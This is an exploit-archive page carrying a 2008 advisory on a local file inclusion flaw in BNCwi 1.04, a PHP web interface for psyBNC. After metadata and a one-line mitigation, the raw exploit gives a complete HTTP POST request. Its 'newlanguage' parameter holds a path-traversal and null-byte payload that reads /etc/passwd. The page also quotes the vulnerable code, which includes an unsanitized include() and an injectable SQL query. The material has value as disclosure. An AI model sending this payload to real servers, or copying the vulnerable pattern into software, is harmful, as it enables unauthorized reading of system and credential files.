BNCwi - exploit.company

vendor:

BNCwi

by:

dun

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: BNCwi

Affected Version From: 01.04

Affected Version To: 01.04

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

BNCwi <= 1.04 Local File Inclusion Vulnerability

BNCwi is a Open-Source webinterface for psyBNC. With it you easily can manage your Bouncer via a graphical interface. A vulnerability exists in the index.php file of the BNCwi script, which allows an attacker to include arbitrary local files on the server. This is due to a lack of input validation on the 'newlanguage' parameter, which is passed to the 'include()' function. An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request with a malicious 'newlanguage' parameter.

Mitigation:

Input validation should be performed on all user-supplied data to prevent malicious input from being passed to the 'include()' function.

Source

Exploit-DB raw data:

  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM

   [ Discovered by dun \ dun[at]strcpy.pl ]

 ###########################################################
 #  [ BNCwi <= 1.04 ]  Local File Inclusion Vulnerability  #
 ###########################################################
 #
 # Script: "BNCwi is a Open-Source webinterface for psyBNC. 
 #		    With it you easily can manage your Bouncer via a graphical interface."
 #
 # Download: http://sourceforge.net/projects/bncwi/
 #
 # [LFI] Vuln: http://site.com/bncwi/index.php
 #	
 # 	POST /bncwi/index.php HTTP/1.1
 #	
 #	Host: www.site.com
 #	User-Agent: Mozilla/5.0
 #	Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 #	Accept-Language: pl,en-us;q=0.7,en;q=0.3
 #	Accept-Encoding: gzip,deflate
 #	Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
 #	Keep-Alive: 300
 #	Connection: keep-alive
 #	Content-Type: application/x-www-form-urlencoded
 #	Content-Length: 49
 #	
 #	newlanguage=../../../../../../../../etc/passwd%00
 #	
 #	HTTP/1.x 200 OK
 #	Date: Fri, 05 Dec 2008 01:27:15 GMT
 #	Server: Apache
 #	X-Powered-By: PHP/5.2.6-pl7-gentoo
 #	Keep-Alive: timeout=15, max=100
 #	Connection: Keep-Alive
 #	Transfer-Encoding: chunked
 #	Content-Type: text/html
 #     
 # Bug: ./bncwi-1.04/index.php (lines: 47-56)
 #
 # ...
 #	if(isset($_POST['newlanguage']))
 #	{
 #		setcookie("bncwi_language", $_POST['newlanguage'], time()+60*60*24*30);
 #		if($_SESSION['logedin'] == "1")
 #		{
 #			mysql_query("UPDATE `$table_customers` SET `language` = '$_POST[newlanguage]' WHERE `serverid` = $_SESSION[server_id] AND BINARY `login` = '$_SESSION[USER_LOGIN]' LIMIT 1;");
 #		}
 #		$_SESSION['language'] = $_POST['newlanguage'];
 #		include("lang_".$_POST['newlanguage'].".inc.php");								//LFI
 #	}
 # ... 	 
 #
 #
 ###############################################
 # Greetz: D3m0n_DE * str0ke * and otherz..
 ###############################################

 [ dun / 2008 ] 

*******************************************************************************************

# milw0rm.com [2008-12-04]